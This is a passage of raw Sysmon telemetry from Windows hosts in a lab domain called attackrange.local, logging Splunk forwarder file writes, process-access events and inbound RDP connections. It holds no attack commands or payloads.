SERVICEtcpfalsefalse212.102.34.245unn-212-102-34-245.datapacket.com45263-false10.0.1.14win-dc-429.attackrange.local3389ms-wbt-server 23542300x80000000000000001050686Microsoft-Windows-Sysmon/Operationalwin-dc-429.attackrange.local-2021-09-27 09:14:28.017{5EBD8912-7F53-614D-7700-00000000FC01}2312NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\SecurityMD5=5251257F1D9FE330D2CC908D814420D0,SHA256=FB56C963697B0E29C7D551E70FD25ACD52E85655BB57DCE144F1FA140EEF5BAC,IMPHASH=00000000000000000000000000000000falsetrue 23542300x80000000000000001050685Microsoft-Windows-Sysmon/Operationalwin-dc-429.attackrange.local-2021-09-27 09:14:28.017{5EBD8912-7F53-614D-7700-00000000FC01}2312NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\SecurityMD5=943E58FD8704F41CB0326844F955BCBF,SHA256=06C7C79FB773DDB32D5FA3FA1405E5CC156CDFEA080715BF35CCEE64AC36AF6E,IMPHASH=00000000000000000000000000000000falsetrue 23542300x80000000000000001050691Microsoft-Windows-Sysmon/Operationalwin-dc-429.attackrange.local-2021-09-27 09:14:29.731{5EBD8912-7F53-614D-7700-00000000FC01}2312NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=B2139CC9F69BC6511E6F65D32BEAC008,SHA256=DF0C3018809773379413F387BBBEA9EF80348779D4EE5CFC80F2F46E4AC31CD1,IMPHASH=00000000000000000000000000000000falsetrue 23542300x8000000000000000979405Microsoft-Windows-Sysmon/Operationalwin-host-542.attackrange.local-2021-09-27 09:14:29.509{69CF5F33-7F3A-614D-7000-00000000FD01}3160NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\SecurityMD5=F2BDA7E188F6937A6BFFEE087AE7875F,SHA256=8A5B18868683116B764A90D5E27A9D1556514032B89B485881BCAF764A9DB1BE,IMPHASH=00000000000000000000000000000000falsetrue 10341000x8000000000000000979404Microsoft-Windows-Sysmon/Operationalwin-host-542.attackrange.local-2021-09-27 09:14:29.306{69CF5F33-8B75-6151-DA79-00000000FD01}1264404C:\Program Files\SplunkUniversalForwarder\bin\splunk-regmon.exe{69CF5F33-7F29-614D-1D00-00000000FD01}1960C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe0x101400C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Program Files\SplunkUniversalForwarder\bin\splunk-regmon.exe+5691a5|C:\Program Files\SplunkUniversalForwarder\bin\splunk-regmon.exe+568cd6|C:\Program Files\SplunkUniversalForwarder\bin\splunk-regmon.exe+56657|C:\Program Files\SplunkUniversalForwarder\bin\splunk-regmon.exe+56ca7|C:\Program Files\SplunkUniversalForwarder\bin\splunk-regmon.exe+8f3800|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 23542300x8000000000000000979403Microsoft-Windows-Sysmon/Operationalwin-host-542.attackrange.local-2021-09-27 09:14:29.197{69CF5F33-7F3A-614D-7000-00000000FD01}3160NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=B3E64A731BD60C74A361108641D01DDD,SHA256=C418B8BA84CBA24933724CD15B612309378C52A9A837C00A2019C69ED77B5A3F,IMPHASH=00000000000000000000000000000000falsetrue 10341000x8000000000000000979402Microsoft-Windows-Sysmon/Operationalwin-host-542.attackrange.local-2021-09-27 09:14:29.150{69CF5F33-7F2A-614D-2B00-00000000FD01}28562876C:\Windows\system32\conhost.exe{69CF5F33-8B75-6151-DA79-00000000FD01}1264C:\Program Files\SplunkUniversalForwarder\bin\splunk-regmon.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\SYSTEM32\ConhostV2.dll+5ca7|C:\Windows\SYSTEM32\ConhostV2.dll+774b|C:\Windows\SYSTEM32\ConhostV2.dll+a8ef|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x8000000000000000979401Microsoft-Windows-Sysmon/Operationalwin-host-542.attackrange.local-2021-09-27 09:14:29.134{69CF5F33-7F28-614D-0C00-00000000FD01}7203228C:\Windows\system32\svchost.exe{69CF5F33-7F28-614D-1A00-00000000FD01}1836C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+e9d6|c:\windows\system32\lsm.dll+d3ae|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d9f41|C:\Windows\System32\RPCRT4.dll+62d4c|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x8000000000000000979400Microsoft-Windows-Sysmon/Operationalwin-host-542.attackrange.local-2021-09-27 09:14:29.134{69CF5F33-7F28-614D-0C00-00000000FD01}7203228C:\Windows\system32\svchost.exe{69CF5F33-7F28-614D-1A00-00000000FD01}1836C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11aad|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d9f41|C:\Windows\System32\RPCRT4.dll+62d4c|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x8000000000000000979399Microsoft-Windows-Sysmon/Operationalwin-host-542.attackrange.local-2021-09-27 09:14:29.134{69CF5F33-7F28-614D-0C00-00000000FD01}7203228C:\Windows\system32\svchost.exe{69CF5F33-7F28-614D-1A00-00000000FD01}1836C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11058|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d9f41|C:\Windows\System32\RPCRT4.dll+62d4c|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x8000000000000000979398Microsoft-Windows-Sysmon/Operationalwin-host-542.attackrange.local-2021-09-27 09:14:29.134{69CF5F33-7F28-614D-0C00-00000000FD01}7203228C:\Windows\system32\svchost.exe{69CF5F33-7F28-614D-1A00-00000000FD01}1836C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+12023|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d9f41|C:\Windows\System32\RPCRT4.dll+62d4c|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x8000000000000000979397Microsoft-Windows-Sysmon/Operationalwin-host-542.attackrange.local-2021-09-27 09:14:29.134{69CF5F33-7F28-614D-0C00-00000000FD01}7203228C:\Windows\system32\svchost.exe{69CF5F33-7F28-614D-1A00-00000000FD01}1836C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+e9d6|c:\windows\system32\lsm.dll+8fc1|c:\windows\system32\lsm.dll+8eb0|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d9f41|C:\Windows\System32\RPCRT4.dll+62d4c|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x8000000000000000979396Microsoft-Windows-Sysmon/Operationalwin-host-542.attackrange.local-2021-09-27 09:14:29.134{69CF5F33-7F28-614D-0C00-00000000FD01}7203228C:\Windows\system32\svchost.exe{69CF5F33-7F28-614D-1A00-00000000FD01}1836C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+e9d6|c:\windows\system32\lsm.dll+8e6f|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d9f41|C:\Windows\System32\RPCRT4.dll+62d4c|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x8000000000000000979395Microsoft-Windows-Sysmon/Operationalwin-host-542.attackrange.local-2021-09-27 09:14:29.134{69CF5F33-7F28-614D-0C00-00000000FD01}7203228C:\Windows\system32\svchost.exe{69CF5F33-7F28-614D-1A00-00000000FD01}1836C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11aad|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d9f41|C:\Windows\System32\RPCRT4.dll+62d4c|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x8000000000000000979394Microsoft-Windows-Sysmon/Operationalwin-host-542.attackrange.local-2021-09-27 09:14:29.134{69CF5F33-7F28-614D-0C00-00000000FD01}7203228C:\Windows\system32\svchost.exe{69CF5F33-7F28-614D-1A00-00000000FD01}1836C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11058|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d9f41|C:\Windows\System32\RPCRT4.dll+62d4c|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x8000000000000000979393Microsoft-Windows-Sysmon/Operationalwin-host-542.attackrange.local-2021-09-27 09:14:29.134{69CF5F33-7F28-614D-0C00-00000000FD01}7203228C:\Windows\system32\svchost.exe{69CF5F33-7F28-614D-1A00-00000000FD01}1836C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+12023|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d9f41|C:\Windows\System32\RPCRT4.dll+62d4c|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x8000000000000000979392Microsoft-Windows-Sysmon/Operationalwin-host-542.attackrange.local-2021-09-27 09:14:29.134{69CF5F33-7F27-614D-0500-00000000FD01}408980C:\Windows\system32\csrss.exe{69CF5F33-8B75-6151-DA79-00000000FD01}1264C:\Program Files\SplunkUniversalForwarder\bin\splunk-regmon.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\system32\basesrv.DLL+2f47|C:\Windows\SYSTEM32\CSRSRV.dll+5645|C:\Windows\SYSTEM32\ntdll.dll+5178f 10341000x8000000000000000979391Microsoft-Windows-Sysmon/Operationalwin-host-542.attackrange.local-2021-09-27 09:14:29.134{69CF5F33-7F29-614D-1D00-00000000FD01}19603060C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe{69CF5F33-8B75-6151-DA79-00000000FD01}1264C:\Program Files\SplunkUniversalForwarder\bin\splunk-regmon.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a7404|C:\Windows\System32\KERNELBASE.dll+2b860|C:\Windows\System32\KERNELBASE.dll+6b246|C:\Windows\System32\KERNEL32.DLL+1c213|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+ce6a3b|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+17cade|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+18641d|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+17ef16|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+c992c4|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+18689b|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+189d3c|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+c95f5f|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+c99fad|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+184c5b|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+c7dd7e|C:\Windows\System32\ucrtbase.dll+1fb80|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 154100x8000000000000000979390Microsoft-Windows-Sysmon/Operationalwin-host-542.attackrange.local-2021-09-27 09:14:29.135{69CF5F33-8B75-6151-DA79-00000000FD01}1264C:\Program Files\SplunkUniversalForwarder\bin\splunk-regmon.exe8.0.2Registry monitorsplunk ApplicationSplunk Inc.splunk-regmon.exe"C:\Program Files\SplunkUniversalForwarder\bin\splunk-regmon.exe"C:\Windows\system32\NT AUTHORITY\SYSTEM{69CF5F33-7F27-614D-E703-000000000000}0x3e70SystemMD5=91F33F605825B72EE2270559C7AB28F3,SHA256=3DF1CB71BB48B8669BD01179FD94DD8CC82F8103B08A0FACFD366E43E0C5FA42,IMPHASH=23D7D4307FBE7FA4F42B1902826D7C25{69CF5F33-7F29-614D-1D00-00000000FD01}1960C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe"C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe" service 23542300x80000000000000001050690Microsoft-Windows-Sysmon/Operationalwin-dc-429.attackrange.local-2021-09-27 09:14:29.516{5EBD8912-7F53-614D-7700-00000000FC01}2312NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\SecurityMD5=5251257F1D9FE330D2CC908D814420D0,SHA256=FB56C963697B0E29C7D551E70FD25ACD52E85655BB57DCE144F1FA140EEF5BAC,IMPHASH=00000000000000000000000000000000falsetrue 354300x80000000000000001050689Microsoft-Windows-Sysmon/Operationalwin-dc-429.attackrange.local-2021-09-27 09:14:27.675{5EBD8912-7F30-614D-0F00-00000000FC01}288C:\Windows\System32\svchost.exeNT AUTHORITY\NETWORK SERVICEtcpfalsefalse87.236.208.230-51158-false10.0.1.14win-dc-429.attackrange.local3389ms-wbt-server 23542300x80000000000000001050692Microsoft-Windows-Sysmon/Operationalwin-dc-429.attackrange.local-2021-09-27 09:14:30.779{5EBD8912-7F53-614D-7700-00000000FC01}2312NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=123A620B47FF7CA0F8D290AF11E0541E,SHA256=C1A59F550DCEBEE99308CF724BAF3F9DE60478983B86028D32CD72DC9BE296E2,IMPHASH=00000000000000000000000000000000falsetrue 23542300x8000000000000000979407Microsoft-Windows-Sysmon/Operationalwin-host-542.attackrange.local-2021-09-27 09:14:30.369{69CF5F33-7F3A-614D-7000-00000000FD01}3160NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=62A4EA99C0F37B9B4A36EB6C2384ADDE,SHA256=255F5C03E6E4E7A8687B1F4121CF2FD925C6D9E2E409A1476385F688488AC38A,IMPHASH=00000000000000000000000000000000falsetrue 354300x8000000000000000979406Microsoft-Windows-Sysmon/Operationalwin-host-542.attackrange.local-2021-09-27 09:14:26.885{69CF5F33-7F33-614D-6600-00000000FD01}4076C:\Program Files\SplunkUniversalForwarder\etc\apps\Splunk_TA_stream\windows_x86_64\bin\streamfwd.exeNT AUTHORITY\SYSTEMtcptruefalse10.0.1.15win-host-542.attackrange.local59416-false10.0.1.12-8000- 23542300x80000000000000001050694Microsoft-Windows-Sysmon/Operationalwin-dc-429.attackrange.local-2021-09-27 09:14:31.779{5EBD8912-7F53-614D-7700-00000000FC01}2312NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=00E02524B1B7C648116C6A4CBB3B5DAF,SHA256=BFD8732ADA133F83EE570EA779D67A51F8C64F0EDC29E3F47ECCB49096303DB3,IMPHASH=00000000000000000000000000000000falsetrue 23542300x8000000000000000979409Microsoft-Windows-Sysmon/Operationalwin-host-542.attackrange.local-2021-09-27 09:14:31.572{69CF5F33-7F3A-614D-7000-00000000FD01}3160NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\SecurityMD5=8D933162EB2703084AC1D256630F3BE9,SHA256=977624C5AB90849E66004D3F1D8A16B1BE02C3D3B6F90E8D24AB22AFAFE4569E,IMPHASH=00000000000000000000000000000000falsetrue 23542300x8000000000000000979408Microsoft-Windows-Sysmon/Operationalwin-host-542.attackrange.local-2021-09-27 09:14:31.415{69CF5F33-7F3A-614D-7000-00000000FD01}3160NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=20783B3260FE7642055B7E1519B215B4,SHA256=9CBE71A2AB8E730E3F2D992B95F8CCAE840DF4643CC2D64E853527231C7774EF,IMPHASH=00000000000000000000000000000000falsetrue 354300x80000000000000001050693Microsoft-Windows-Sysmon/Operationalwin-dc-429.attackrange.local-2021-09-27 09:14:28.823{5EBD8912-7F4C-614D-6E00-00000000FC01}3728C:\Program Files\SplunkUniversalForwarder\etc\apps\Splunk_TA_stream\windows_x86_64\bin\streamfwd.exeNT AUTHORITY\SYSTEMtcptruefalse10.0.1.14win-dc-429.attackrange.local53404-false10.0.1.12ip-10-0-1-12.eu-central-1.compute.internal8000- 23542300x80000000000000001050695Microsoft-Windows-Sysmon/Operationalwin-dc-429.attackrange.local-2021-09-27 09:14:32.816{5EBD8912-7F53-614D-7700-00000000FC01}2312NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=468D32E680D0979AAF9E318B23196D0E,SHA256=E6E42309D1BB772380269F2158375E3C5D2A0F530E54106E5EECB111A45546FA,IMPHASH=00000000000000000000000000000000falsetrue 23542300x8000000000000000979413Microsoft-Windows-Sysmon/Operationalwin-host-542.attackrange.local-2021-09-27 09:14:32.556{69CF5F33-7F28-614D-1200-00000000FD01}968NT AUTHORITY\LOCAL SERVICEC:\Windows\System32\svchost.exeC:\Windows\ServiceProfiles\LocalService\AppData\Local\lastalive1.datMD5=D2B30FD79D3982B85DA16970BB2BB7DE,SHA256=10FE6988B87E6C6386D6A934347FF997FBFA2F16396077B75A211CB52EBDB8F6,IMPHASH=00000000000000000000000000000000falsetrue 23542300x8000000000000000979412Microsoft-Windows-Sysmon/Operationalwin-host-542.attackrange.local-2021-09-27 09:14:32.509{69CF5F33-7F3A-614D-7000-00000000FD01}3160NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=F72AC4B6F2FBFABBD33651102B87BFA1,SHA256=F6D8E362004E831513B97006DD08179F435FD2B253FF382BD82883E45FB64A45,IMPHASH=00000000000000000000000000000000falsetrue 354300x8000000000000000979411Microsoft-Windows-Sysmon/Operationalwin-host-542.attackrange.local-2021-09-27 09:14:28.941{69CF5F33-7F28-614D-1000-00000000FD01}944C:\Windows\System32\svchost.exeNT AUTHORITY\NETWORK SERVICEtcpfalsefalse87.236.208.230-52538-false10.0.1.15win-host-542.attackrange.local3389ms-wbt-server 354300x8000000000000000979410Microsoft-Windows-Sysmon/Operationalwin-host-542.attackrange.local-2021-09-27 09:14:28.625{69CF5F33-7F28-614D-1000-00000000FD01}944C:\Windows\System32\svchost.exeNT AUTHORITY\NETWORK SERVICEtcpfalsefalse181.214.206.115-56447-false10.0.1.15win-host-542.attackrange.local3389ms-wbt-server 23542300x8000000000000000979414Microsoft-Windows-Sysmon/Operationalwin-host-542.attackrange.local-2021-09-27 09:14:33.587{69CF5F33-7F3A-614D-7000-00000000FD01}3160NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=4AFC8A0964776F4F595CF7924005BA0A,SHA256=02C8F22E143784F7C0E1C83795ECA5ED2786E22D26B287A76DC2A45F22E49BDB,IMPHASH=00000000000000000000000000000000falsetrue 23542300x80000000000000001050696Microsoft-Windows-Sysmon/Operationalwin-dc-429.attackrange.local-2021-09-27 09:14:33.848{5EBD8912-7F53-614D-7700-00000000FC01}2312NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=ADB270AF37364554AC76AB7B349B3C3E,SHA256=860328D301FA1F7D146C73978508477593C67E52F0AE4C3A3431043B81A961EE,IMPHASH=00000000000000000000000000000000falsetrue 23542300x8000000000000000979415Microsoft-Windows-Sysmon/Operationalwin-host-542.attackrange.local-2021-09-27 09:14:34.822{69CF5F33-7F3A-614D-7000-00000000FD01}3160NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=9C50FA24D2319411B5FC97DD13B94E92,SHA256=90D2A69F5E321069F8ACE66F8D6DB1796525B5985B76284C3F32CA9EC50A67C2,IMPHASH=00000000000000000000000000000000falsetrue 23542300x80000000000000001050697Microsoft-Windows-Sysmon/Operationalwin-dc-429.attackrange.local-2021-09-27 09:14:34.864{5EBD8912-7F53-614D-7700-00000000FC01}2312NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=EF48E847B5439CD2E278A36CA50F2167,SHA256=35074C2E27133D6B97DA77BFC80018C215D38454D5A3D7F30C91EFA6D3B73843,IMPHASH=00000000000000000000000000000000falsetrue 23542300x80000000000000001050702Microsoft-Windows-Sysmon/Operationalwin-dc-429.attackrange.local-2021-09-27 09:14:35.878{5EBD8912-7F53-614D-7700-00000000FC01}2312NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=30B27EAE7270DD25392F665C7A6DB3A9,SHA256=1B926B2546A10EED66B9DAED80866B3725F8892AA411E8D027FC08E3F2A69A97,IMPHASH=00000000000000000000000000000000falsetrue 354300x80000000000000001050701Microsoft-Windows-Sysmon/Operationalwin-dc-429.attackrange.local-2021-09-27 09:14:33.574{5EBD8912-7F30-614D-0F00-00000000FC01}288C:\Windows\System32\svchost.exeNT AUTHORITY\NETWORK SERVICEtcpfalsefalse87.236.208.231-60152-false10.0.1.14win-dc-429.attackrange.local3389ms-wbt-server 23542300x80000000000000001050700Microsoft-Windows-Sysmon/Operationalwin-dc-429.attackrange.local-2021-09-27 09:14:35.369{5EBD8912-7F40-614D-2C00-00000000FC01}3028NT AUTHORITY\SYSTEMC:\Program Files\Amazon\SSM\amazon-ssm-agent.exeC:\ProgramData\Amazon\SSM\InstanceData\i-0fd64d26ae25a9a58\channels\health\respondent-20210924073323-4310MD5=3A908804D0573FF7380F514264884FB3,SHA256=C81D2F048F52EDBC4290754297EEBE81A82636336939823758E35E4C6AD1E005,IMPHASH=00000000000000000000000000000000falsetrue 23542300x80000000000000001050699Microsoft-Windows-Sysmon/Operationalwin-dc-429.attackrange.local-2021-09-27 